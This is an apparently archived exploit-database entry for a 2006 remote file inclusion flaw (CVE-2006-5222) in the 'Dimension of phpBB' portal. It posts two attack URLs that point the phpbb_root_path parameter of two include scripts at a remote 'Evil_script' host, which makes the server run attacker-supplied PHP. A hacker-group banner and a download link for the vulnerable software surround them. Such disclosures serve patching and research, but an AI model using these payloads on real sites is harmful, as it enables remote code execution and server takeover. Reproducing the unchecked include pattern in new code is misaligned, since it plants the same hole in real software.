Dimension of phpBB <= 0.2.6 phpbb_root_path Remote File Includes

2006-10-05T00:00:00
ID EDB-ID:2481
Type exploitdb
Reporter SpiderZ
Modified 2006-10-05T00:00:00

Description

Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes. CVE-2006-5222. Webapps exploit for php platform

                                        
                                            _________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  &gt;&lt;  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Dimension of phpBB Remote File Inclusion Vulnerability
# For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]


------------------------------------------------------------------------------

# Download: http://www.phpbb-dimension.de/dload.php?action=category&cat_id=16

------------------------------------------------------------------------------

# milw0rm.com [2006-10-05]